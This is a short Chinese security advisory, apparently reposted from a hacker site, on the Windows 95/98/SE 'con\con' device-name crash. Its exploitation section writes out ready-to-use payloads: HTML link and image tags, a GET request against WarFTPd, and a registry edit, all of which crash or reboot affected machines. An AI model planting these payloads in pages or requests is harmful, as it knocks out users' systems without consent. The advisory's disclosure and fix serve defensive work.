Windows 95/98/SE 远程DoS攻击

/ns/wz/net/data/20010414002618.htm

Windows 95/98/SE 远程DoS攻击

受影响的系统:Windows 95/98/SE

不受影响的版本: 未知

远程: YES / 本地:YES

内容摘要:

当系统受到这个一个特殊的路径时将重起或崩溃。

受影响的还有

WarFTPd (Windows 95/98/SE)

Microsoft Outlook (Windows 95/98/SE)

Eudora Pro 4.2 (Windows 95/98/SE)

漏洞的利用:

1.

<HTML>

<BODY>

<A HREF="c:\con\con">crashing IE</A>

<!-- or nul\nul, clock$\clock$ -->

<!-- or aux\aux, config$\config$ -->

</BODY>

</HTML>

2.

GET /con/con 或 GET /nul/nul 在WarFTPd的root目录下


3.

修改注册表[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open]

c:\con\con "%1" %* 或 c:\nul\nul "%1" %*


4.

<HTML>

<BODY>

<IMG SRC="c:\con\con">

<!-- or nul\nul, clock$\clock$ -->

<!-- or aux\aux, config$\config$ -->

</BODY>

</HTML>


解决方案:

升级到Windows NT或Windows 2000

Last Modify Time [2000-03-09]

转自:黑客天堂